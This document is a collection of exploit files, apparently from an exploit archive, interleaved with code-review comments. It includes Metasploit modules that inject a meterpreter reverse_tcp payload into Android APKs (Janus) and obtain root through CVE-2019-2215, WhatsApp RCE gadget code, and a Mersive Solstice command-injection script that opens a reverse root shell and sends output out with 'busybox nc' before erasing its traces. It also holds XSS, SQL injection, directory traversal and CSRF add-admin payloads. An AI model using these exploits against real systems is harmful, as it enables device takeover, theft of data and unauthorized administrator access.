# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/apk'
class MetasploitModule < Msf::Exploit::Local
Rank = ManualRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Post::Android::Priv
include Msf::Payload::Android
def initialize(info={})
super( update_info( info, {
'Name' => "Android Janus APK Signature bypass",
'Description' => %q{
This module exploits CVE-2017-13156 in Android to install a payload into another
application. The payload APK will have the same signature and can be installed
as an update, preserving the existing data.
The vulnerability was fixed in the 5th December 2017 security patch, and was
additionally fixed by the APK Signature scheme v2, so only APKs signed with
the v1 scheme are vulnerable.
Payload handler is disabled, and a multi/handler must be started first.
},
'Author' => [
'GuardSquare', # discovery
'V-E-O', # proof of concept
'timwr', # metasploit module
'h00die', # metasploit module
],
'References' => [
[ 'CVE', '2017-13156' ],
[ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
[ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
],
'DisclosureDate' => 'Jul 31 2017',
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ 'android' ],
'Arch' => [ ARCH_DALVIK ],
'Targets' => [ [ 'Automatic', {} ] ],
'DefaultOptions' => {
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
'DisablePayloadHandler' => true,
},
'DefaultTarget' => 0,
'Notes' => {
'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
}
}))
register_options([
OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
]
end
def check
os = cmd_exec("getprop ro.build.version.release")
unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
vprint_error "Android version #{os} is not vulnerable."
return CheckCode::Safe
end
vprint_good "Android version #{os} appears to be vulnerable."
patch = cmd_exec('getprop ro.build.version.security_patch')
if patch.empty?
print_status 'Unable to determine patch level. Pre-5.0 this is unaccessible.'
elsif patch > '2017-12-05'
vprint_error "Android security patch level #{patch} is patched."
return CheckCode::Safe
else
vprint_good "Android security patch level #{patch} is vulnerable"
end
CheckCode::Appears
end
def exploit
def infect(apkfile)
unless apkfile.start_with?("package:")
fail_with Failure::BadConfig, 'Unable to locate app apk'
end
apkfile = apkfile[8..-1]
print_status "Downloading APK: #{apkfile}"
apk_data = read_file(apkfile)
begin
# Create an apk with the payload injected
apk_backdoor = ::Msf::Payload::Apk.new
apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
# Extract the classes.dex
dex_data = ''
Zip::File.open_buffer(apk_zip) do |zipfile|
dex_data = zipfile.read("classes.dex")
end
dex_size = dex_data.length
# Fix the original APKs zip file code directory
cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
pos = cd_start_addr
while pos && pos < cd_end_addr
offset = apk_data[pos+42, pos+46].unpack("V")[0]
apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
end
# Prepend the new classes.dex to the apk
out_data = dex_data + apk_data
out_data[32...36] = [ out_data.length ].pack("V")
out_data = fix_dex_header(out_data)
out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
print_status "Uploading APK: #{out_apk}"
write_file(out_apk, out_data)
register_file_for_cleanup(out_apk)
print_status "APK uploaded"
# Prompt the user to update the APK
session.appapi.app_install(out_apk)
print_status "User should now have a prompt to install an updated version of the app"
true
rescue => e
print_error e.to_s
false
end
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if datastore["PACKAGE"] == 'ALL'
vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
apkfiles = []
all = cmd_exec("pm list packages").split("\n")
c = 1
all.each do |package|
package = package.split(':')[1]
vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
c += 1
next if ['com.metasploit.stage', # avoid injecting into ourself
].include? package # This was left on purpose to be expanded as need be for testing
result = infect(cmd_exec("pm path #{package}"))
break if result
end
else
infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
end
end
end
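Review bot: in check, `elsif patch > '2017-12-05'` reports a device whose security patch level is exactly 2017-12-05 as vulnerable, yet the description says the bug was fixed in the 5 December 2017 patch; use `>=`. In infect, `apk_data[cd_end_addr+16, cd_end_addr+20]` and `apk_data[pos+42, pos+46]` use Ruby's String#[](start, length) form with an end offset as the length; they only work because unpack("V") consumes four bytes, so write `apk_data[cd_end_addr+16, 4]` and `apk_data[pos+42, 4]`. The `def infect` nested inside `def exploit` also (re)defines a public method on the class every time exploit runs; make it a private instance method at class level.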

exploits/android/local/48129.rb Executable file

@ -0,0 +1,67 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => "Android Binder Use-After-Free Exploit",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # discovery and exploit
'Maddie Stone', # discovery and exploit
'grant-h', # Qu1ckR00t
'timwr', # metasploit module
],
'References' => [
[ 'CVE', '2019-2215' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
[ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
[ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
],
'DisclosureDate' => "Sep 26 2019",
'SessionTypes' => [ 'meterpreter' ],
'Platform' => [ "android", "linux" ],
'Arch' => [ ARCH_AARCH64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
'WfsDelay' => 5,
},
'DefaultTarget' => 0,
}
))
end
def upload_and_chmodx(path, data)
write_file path, data
chmod(path)
register_file_for_cleanup(path)
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
exploit_data = File.read(local_file, {:mode => 'rb'})
workingdir = session.fs.dir.getwd
exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(exploit_file, exploit_data)
payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
upload_and_chmodx(payload_file, generate_payload_exe)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end
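Review bot: 'Description' is an empty %q{} block; the module metadata should describe the bug (CVE-2019-2215, the binder_thread wait queue use-after-free from the referenced Project Zero issue), the fact that it only targets aarch64, and that it depends on a precompiled binary at data/exploits/CVE-2019-2215/exploit which this hunk does not add. The result of `cmd_exec("echo '#{payload_file} &' | #{exploit_file}")` is printed but never inspected, so a failed run still ends with the module reporting success; checking for the expected output (or for the session) before returning would make failures visible.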


@ -0,0 +1,109 @@
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
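Review bot: search_for_gadget_offset() does not check the results of `FILE* fd = fopen("/system/lib64/libhwui.so","rb");` or of fread(), so a missing or unreadable library crashes in fseek(NULL) instead of reporting an error, and the loop condition `while(pos <= filelen)` reads buffer[filelen], the uninitialised extra byte from the malloc; use `pos < filelen` and free the buffer afterwards. The file relies on transitive includes for fopen, strcmp, malloc and snprintf; add <cstdio>, <cstring> and <cstdlib> explicitly so it compiles under a stricter NDK toolchain.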

exploits/android/webapps/47722.py Executable file

@ -0,0 +1,208 @@
# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description : This will exploit an (authenticated) blind OS command injection
# vulnerability present in Solstice devices running versions
# of the firmware prior to 2.8.4.
# Notes : To get the the command output (in piped-mode), a netcat listener
# (e.g. 'nc -lkvp <LPORT>') needs to be launched before
# running the exploit.
# To get an interactive root shell use the following syntax
# 'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
# -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
# -e /system/bin/sh -i"'.
#!/usr/bin/env python3
import argparse
import logging
import requests
import sys
import time
def parse_args():
""" Parse and validate the command line supplied by users
"""
parser = argparse.ArgumentParser(
description="Solstice Pod Blind Command Injection"
)
parser.add_argument(
"-d",
"--debug",
dest="loglevel",
help="enable verbose debug mode",
required=False,
action="store_const",
const=logging.DEBUG,
default=logging.INFO
)
parser.add_argument(
"-lh",
"--lhost",
dest="lhost",
help="the listening address",
required=False,
type=str
)
parser.add_argument(
"-lp",
"--lport",
dest="lport",
help="the listening port - default 4444",
required=False,
default="4444",
type=str
)
parser.add_argument(
"-p",
"--payload",
dest="payload",
help="the command to execute",
required=True,
type=str
)
parser.add_argument(
"-pass",
"--password",
dest="password",
help="the target administrator password",
required=False,
default="",
type=str
)
parser.add_argument(
"-rh",
"--rhost",
dest="rhost",
help="the target address",
required=True,
type=str
)
return parser.parse_args()
def main():
try:
args = parse_args()
lhost = args.lhost
lport = args.lport
password = args.password
rhost = args.rhost
logging.basicConfig(
datefmt="%H:%M:%S",
format="%(asctime)s: %(levelname)-8s %(message)s",
handlers=[logging.StreamHandler()],
level=args.loglevel
)
# Redirect stdout and stderr to <FILE>
# only when the exploit is launched in piped mode
if lhost and lport:
payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
logging.info(
"attacker listening address: {}:{}".format(lhost, lport)
)
else:
payload = args.payload
logging.info("solstice pod address: {}".format(rhost))
if password:
logging.info(
"solstice pod administrator password: {}".format(password)
)
# Send the payload to be executed
logging.info("sending the payload...")
send_payload(rhost, password, payload)
# Send the results of the payload execution to the attacker
# using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
if lhost and lport:
payload = (
"busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
lhost, lport
)
)
logging.info("retrieving the results...")
send_payload(rhost, password, payload)
# Erase exploitation traces
payload = "rm -f /data/local/tmp/rce.tmp"
logging.info("erasing exploitation traces...")
send_payload(rhost, password, payload)
except KeyboardInterrupt:
logging.warning("'CTRL+C' pressed, exiting...")
sys.exit(0)
def send_payload(rhost, password, payload):
URL = "http://{}/Config/service/saveData".format(rhost)
headers = {
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"Referer": "http://{}/Config/config.html".format(rhost)
}
data = {
"m_networkCuration":
{
"ethernet":
{
"dhcp": False,
"staticIP": "; {}".format(payload),
"gateway": "",
"prefixLength": 24,
"dns1": "",
"dns2": ""
}
},
"password": "{}".format(password)
}
# Debugging using the BurpSuite
# proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'https://127.0.0.1:8080'
# }
try:
logging.info("{}".format(payload))
response = requests.post(
URL,
headers=headers,
# proxies=proxies,
json=data
)
logging.debug(
"{}".format(response.json())
)
# Wait for the command to be executed
time.sleep(2)
except requests.exceptions.RequestException as ex:
logging.error("{}".format(ex))
sys.exit(0)
if __name__ == "__main__":
main()
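Review bot: `send_payload` calls `sys.exit(0)` from the `except requests.exceptions.RequestException` branch, so a network failure terminates the script with a success status and `main` never learns that the request was not delivered; use a non-zero exit code or let the exception propagate. The script also prints the administrator password at INFO level (`logging.info("solstice pod administrator password: {}".format(password))`), which lands a credential in console output and in any captured log; log it at DEBUG or mask it. In the header, `# Date: 2016-12-23` precedes both the CVE-2017-12945 identifier and the 2.8.4 fix the description refers to, so that field should be checked.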


@ -0,0 +1,183 @@
# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>
<input name='f' id='dd'>
</form>
<script>
document.getElementById("dd").value= JSON.stringify({
id: '1',
method: 'deleteDashboard',
params:{ 'id' : 21}
});
document.getElementById("del").submit();
</script>
##########################################
#all methods is vulnerable
##########################################
#addDashboard(p)
#addDashboardUser(par)
#addDashboardUserList(par)
#applySchedulingForDashboard(dashboardId, taskId, config)
#applySchedulingForFolder(folderId, taskId, config)
#applySchedulingForReport(reportId, taskId, vmr, config)
#canModifyDashboard(id)
#captureContainer(data, taskId)
#changeObjectVisibility(objectId, visible)
#checkForUpdateReportPack(confirm)
#checkIfAdmin()
#checkUserPermissionsResolved(o)
#checkWinVersion()
#clearContainer()
#connectToSqlServer(data, save)
#DBExecuteProcedure(db)
#DBStoreLoad(db)
#DBStoreSave(db)
#deleteDashboard(id)
#deleteDashboardImage(imageId)
#deleteDashboardWidget(p)
#DeleteFolder(param)
#deleteReportPack(name, id, type)
#deleteTask(id)
#doLogin(domain, login, password)
#editDashboard(p)
#emptyDashboardRecycleBin(o)
#findDashboardUsers(p)
#getAboutData()
#getActionParameters()
#getAdvancedData()
#getAlarms()
#getAllSchedulingsForDashboard(info)
#getAllSchedulingsForFolder(info)
#getAllSchedulingsForReport(info)
#getBackUpTree(wsj)
#getBusinessViewTree(wsj)
#getComboData()
#getCommonGridItem()
#getConfiguration()
#getConfigurationOverview(id)
#getConnectedServersGridItem()
#getDashboardData(dashboard_id)
#getDashboardImages(p)
#getDashboardPermissions(p)
#getDashboardPredefiniedReports(p)
#getDashboards(p)
#getDashboardSSRSChartTypes(p)
#getDashboardUserList(p)
#getDashboardWidgetTypeData(p)
#getDefaultUserName()
#getDeletedDashboards(p)
#getEnumeratingTaskContainers(id)
#getEnumeratingTaskProperties(id)
#getEnumeratingTaskScheduling(id)
#getExtensionModules(p)
#getIgnoredDatastores(p)
#getIgnoredDatastoresDetails(p)
#getInfrastructureTree(wsj)
#getIsReporterFreeVersion()
#getJobData(id)
#getLicenseData()
#getLicensedHVSockets(p)
#getLicensedVMSockets(p)
#getMetadata(query, reload)
#getNeedToDisableTabs()
#getNotificationData()
#getObjectsToHide(p)
#getOptionList()
#getReportFilters(param)
#getReportImageName()
#getReportListTreeCheckbox(wsj)
#getReportListTreeDashboard(wsj)
#getReportListTreeWorkspace(wsj)
#getReportManagementTree(wsj)
#getReportsSectionsTree(wsj)
#getReportStatistics(param)
#getScheduleDashboardConfig(dashboardId, taskId)
#getScheduleFolderConfig(folderId, taskId)
#getScheduleReportConfig(reportId, taskId, packType)
#getScriptArgumentList()
#getServerScopeAll(wsj)
#getSessionDetails(idwithtype)
#getSessions(p)
#getSessionsTaskTypes(p)
#getSiteStatusGridItem()
#getSmtpServerData()
#getSqlServerData()
#getSsrsServerData()
#getSSRSStatus()
#getStartStopDeleteButtonsEnabled(id)
#getStatistics()
#getTaskList(p)
#getUpdateSessionInfo(o)
#getvCloudList(p)
#getVideoReportData(interval, intervalPeriod, scope)
#getVmStatus()
#getWidgetCustomChartConstructorData(p)
#getWidgetData(r)
#getWidgetList(item)
#getWidgetPackList(j)
#getWidgetParams(uid)
#getWorkspace()
#getWorkspaceReportGridItems(param)
#isSmtpConfigured()
#publishDashboard(id, publish)
#recalculateProjects(ids)
#removeDashboardUser(par)
#resetReportImageName()
#resetSchedulingForDashboard(dashboardId, taskId)
#resetSchedulingForDashboardArray(dashboardId, taskId)
#resetSchedulingForFolder(folderId)
#resetSchedulingForReport(reportId, vmr)
#resetSchedulingTaskForFolder(folderId, taskId)
#resetSchedulingTaskForReport(reportId, taskId, vmr)
#resetSchedulingTasksForFolderArray(folderId, taskId)
#resetSchedulingTasksForReportArray(reportId, taskId, vmr)
#restoreDashboard(p)
#revokeHost(hostName)
#revokeHostHV(hostName)
#SaveFolder(param)
#saveIgnoredDatastores(taskContainerId, dataStores)
#saveSchedulingInfo(taskId, taskProp)
#saveTask(taskProp, taskContainers, excludes)
#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)
#sendTestMessage(data, setting)
#setAdvancedData(measure)
#setComboData(data)
#setDashboardUserPermissions(par)
#setDashboardWidget(p)
#SetDragAndDropPosition(dwid, colIndex, position, height)
#setSchedulingEnability(dashboardId, taskId, disabled)
#setSchedulingEnabilityArray(dashboardId, taskId, disabled)
#setSchedulingEnabilityForFolder(folderId, taskId, disabled)
#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)
#setSchedulingEnabilityForReport(reportId, taskId, disabled)
#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)
#setSmtpServerData(data)
#setSsrsServerData(data)
#startTask(id)
#stopTask(id)
#system.about()
# Returns a summary about the server implementation for display purposes.
#system.listMethods()
# Returns an array of method names implemented by this service.
#system.version()
# Returns the version server implementation using the major, minor, build and revision format.
#testServer(tcd)
#testSsrsConnection(data)
#updateDashboardPosition(p)
#updateTreeExpandedStates(wsj, a)
#validateTaskName(tcd, id)
##########################################
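Review bot: the advisory records no Description, CVE or fix/mitigation, and the list under `#all methods is vulnerable` is a bare dump: it does not say which methods change state (for example `deleteDashboard(id)`, `DBExecuteProcedure(db)`, `doLogin(domain, login, password)`) and which only read data, nor which require an administrator session, so the real impact of a forged request to `CommonDataHandlerReadOnly.ashx` cannot be judged from the file. The `id: 21` in the PoC form is an arbitrary dashboard id and should be marked as a placeholder.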


@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: addDashboard / editDashboard
SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
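Review bot: the PoC does not say where the `Description(config)` value is rendered unescaped or which users view it, so the stored XSS impact (who executes the injected script, and whether the author needs dashboard edit rights) is undocumented; add that and a fixed-version or mitigation line. The payload is also wrapped in typographic quotes (`“…”`), which will not paste cleanly.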


@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: setDashboardWidget
SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
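Review bot: this file only changes the method (`setDashboardWidget`) and the field (`Caption`) relative to the preceding Veeam ONE Reporter advisory, and like it gives no rendering context (which page shows the `Caption` value and to whom) and no fix or mitigation reference; one advisory listing both injection points with that information would serve readers better. The typographic quotes around the payload should be plain `"` as well.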


@ -0,0 +1,28 @@
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF
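Review bot: `http://host/patch/pagina.phtml?explode_tree=` reads `patch` where `path` is clearly meant, and the advisory has no Version field, so a CWE-89 finding rated High is attached to no affected release; add the tested version range and whether the vendor was notified. `[+] Tested on: Windows 7 and Gnu/Linux` describes the tester's client, not the affected server, and says nothing about the target.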


@ -0,0 +1,19 @@
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows
# Vulnerable parameter: PF (member_profile.asp)
# GET Request
GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
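Review bot: the captured request carries live session identifiers (`wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=...`) that should be redacted before publication, and the file does not state whether the `PF` parameter on `member_profile.asp` is reachable without an authenticated session, which is the key fact for rating the issue. Minor: `# Tested on Windows` breaks the `# Field: value` header convention used on the other lines.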


@ -0,0 +1,27 @@
# Title: Crystal Live HTTP Server 6.01 - Directory Traversal
# Date of found: 2019-11-17
# Author: Numan Türle
# Vendor Homepage: https://www.genivia.com/
# Version : Crystal Quality 6.01.x.x
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/
POC
---------
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
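Review bot: the request line `GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1` lacks the space before `HTTP/1.1`, so the PoC as pasted is not a well-formed request, and `Host: 12.0.0.1` looks like a typo for `127.0.0.1`. The header is also inconsistent with itself: the Vendor Homepage points at `https://www.genivia.com/` while the Software Link points at `https://www.crystalrs.com/`, and the title names Crystal Live HTTP Server 6.01 while the Version field says Crystal Quality 6.01.x.x; one product name and one vendor should be settled on.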


@ -0,0 +1,22 @@
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.
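Review bot: `Solution: Update to the latest version released by vendor.` names no fixed release, so a reader cannot tell which Rumpus version closes CVE-2019-19368; record it. The PoC also injects directly after `?` in `/Login?!'><sVg/OnLoAD=alert`1`//` without a parameter name, so the advisory should state which part of the query string the login page reflects.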


@ -0,0 +1,27 @@
# Exploit Title: OLK Web Store 2020 - Cross-Site Request Forgery
# Google Dork: intext:"TopManage ® 2002 - 2020"
# Date: 2020-01-13
# Exploit Author: Joel Aviad Ossi
# Vendor Homepage: http://www.topmanage.com/
# Software Link: http://www.topmanage.com/microsites/olk-web-store/
# Version: 2020
# Tested on: N/A
# CVE : N/A
# Reference: https://websec.nl/news.php
POST /olk/client/login.asp HTTP/1.1
Host: examplesite.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://examplesite.com
Connection: close
Referer: https://examplesite.com/olk/client/login.asp?se=Y
Cookie: myLng=en; ASPSESSIONIDCGARQSCD=JGFFLBIAAKGBKANKLAPHMEDH
Upgrade-Insecure-Requests: 1
dbID=0&UserName=%22%3EPOC&Password=%22%3ECSRF&newLng=en&btnEnter=Enter&sHeight=400&other=
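Review bot: the file is titled Cross-Site Request Forgery but shows only a direct login POST to `/olk/client/login.asp` with `Origin` and `Referer` set to the target itself and a session cookie attached; it never shows a cross-origin request or the state-changing action being forged, so it does not demonstrate the issue claimed. The `ASPSESSIONIDCGARQSCD` cookie value should be redacted, and `Tested on: N/A` together with `CVE : N/A` leaves the affected build unspecified.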


@ -0,0 +1,28 @@
# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-03-05
# Exploit Author: Miguel Mendez Z.
# Vendor Homepage: www.sumavision.com
# Software Link: http://www.sumavision.com/ensite/i.php?id=29
# Version: EMR 3.0.4.27
# CVE : CVE-2020-10181
-----------------------Exploit Bash---------------------------
echo ""
read -p "Set Hostname: " host
read -p "Set username: " user
echo "(The password should be between 6 and 32 in length)"
read -p "Set password: " pass
echo
echo "[+] creating user..."
sleep 2
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
if echo "$postdata" | grep -q "0</html>"; then
echo "[+] http://$host/frame_en.asp"
echo "[+] created access($user - $pass)"
else
echo "[-] user not created"
fi
------------------------------------------------------
Reference:
